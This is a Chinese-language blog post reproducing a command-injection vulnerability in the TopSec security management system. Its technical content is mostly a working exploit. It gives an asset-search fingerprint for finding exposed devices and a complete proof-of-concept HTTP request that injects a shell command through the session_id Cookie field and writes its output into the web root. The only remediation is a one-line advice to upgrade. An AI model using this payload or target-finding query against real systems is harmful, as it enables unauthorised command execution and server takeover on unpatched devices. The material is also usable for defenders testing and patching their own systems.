天融信TOPSEC Cookie 远程命令执行漏洞

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量951 收藏 12
点赞数 22
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135381211
版权

产品介绍

天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等应用价值。

漏洞描述

天融信TopSec安全管理系统 Cookie字段存在远程命令执行漏洞,通过该漏洞,攻击者可通过构造恶意字符串,执行任意系统命令,从而拿下服务器权限。

资产测绘

title=“Web User Login” && body=“/cgi/maincgi.cgi?Url=VerifyCode”
在这里插入图片描述

漏洞复现

POC如下:

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1
Host: your_ip
Cookie: session_id_443=1|echo `id`  > /www/htdocs/site/image/qqqq.txt;
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

在这里插入图片描述
查看回显
在这里插入图片描述

可执行任意系统命令,需尽快修复。

修复建议

联系软件厂商升级至最新安全版本

keepb1ue
关注
  • 22
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】天融信TOPSEC static_convert 远程命令执行
失心少年
01-12 299
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。
漏洞复现】天融信TOPSEC-static-convert-远程命令执行
知黑而守白
01-04 192
攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性。天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。
天融信TOPSEC Cookie 远程命令执行漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 1019
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 656
漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞,附带自己写的poc脚本
漏洞复现--天融信TOPSEC两处远程命令执行
qq_53003652的博客
01-04 1151
天融信TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。访问/site/image/vul.txt。
漏洞复现】某厂商TopSec maincgi.cgi远程命令执行漏洞
晚风不及你
03-01 524
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。
天融信防火墙命令.pdf
10-28
天融信防火墙命令.pdf
天融信图标库Topsec Icons V3(新版本)_6.30
04-07
天融信图标库Topsec Icons V3(新版本)_6.30》是一个专为IT行业设计的图标资源集合,适用于2020年及以后的项目需求。该图标库由知名信息安全企业天融信Topsec)推出,旨在为专业人员提供高质量、统一风格的图形...
topsec手册
08-09
天融信TOPSEC安全产品手册》是一份详尽阐述天融信安全产品配置与操作界面的指导性文档。这份手册对于理解并有效利用天融信的网络安全解决方案至关重要,尤其对于系统管理员、网络安全专业人员以及对天融信产品感...
天融信防火墙配置手册.zip
07-14
目录 ACM NGTOS WAF 防毒墙 防火墙 负载均衡 静态隧道 漏扫 入侵防御 网闸
天融信防火墙命令手册——很有用
08-18
天融信防火墙命令手册,希望对大家有用!谢谢支持!
天融信TopSec的使用-1-主机评估篇
轻舟已过万重山
04-04 1883
天融信脆弱性扫描与管理系统是一款专业的网络安全工具,旨在帮助企业全面检测网络环境中的安全漏洞,并提供相应的修复建议和管理策略。该系统综合运用了多种扫描手段和技术,包括智能主机服务发现、预探测、多线程扫描等,能够快速准确地发现网络中的存活主机和存在的漏洞弱点。
CGI漏洞利用
热门推荐
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
D-Link service.cgi远程命令执行漏洞复现
weixin_34311757的博客
01-25 373
1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家。 1月17日,CNVD公开了D-LinkDIR 615/645/815 service.cgi远程命令执行漏洞(CNVD-2018-01084)。由于笔者近期对网络设备进行渗透技术略有研究,便复现了一下该漏洞。 1....
天融信top sec防火墙关于内外网ip映射配置
dengtaowei的专栏
08-13 1万+
我们经常需要外网的应用能被外网访问,但是外网ip的资源是有限的,如何能让多个应用通过一个或有限的外网ip访问呢,我知道的有一下两种方式:一是直接利用硬件做内外网的映射;另一种则是利用apache+jk做内外网的映射。下面主要介绍前一种方式: 资源:1.硬件为天融信top sec
天融信资料下载官方FTP服务器
weixin_30871701的博客
03-15 3500
2017年更新:最近发现天融信的FTP服务器变更为了ftp://ftp.topsec.com.cn/,用户名:topsec,密码:topsec2016(不知道后期密码会不会改成topsec2017,如果进不去也可以打天融信800电话询问)。 ============================================================================ ...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 411
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
天融信防火墙命令行操作详解与授权管理
天融信防火墙命令行手册》是天融信公司为其网络安全卫士防火墙系统编撰的一份技术文档,旨在提供用户对防火墙功能进行配置、管理和监控的详细指导。该手册适用于网络管理员和技术人员,内容涵盖了基础配置、AAA...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值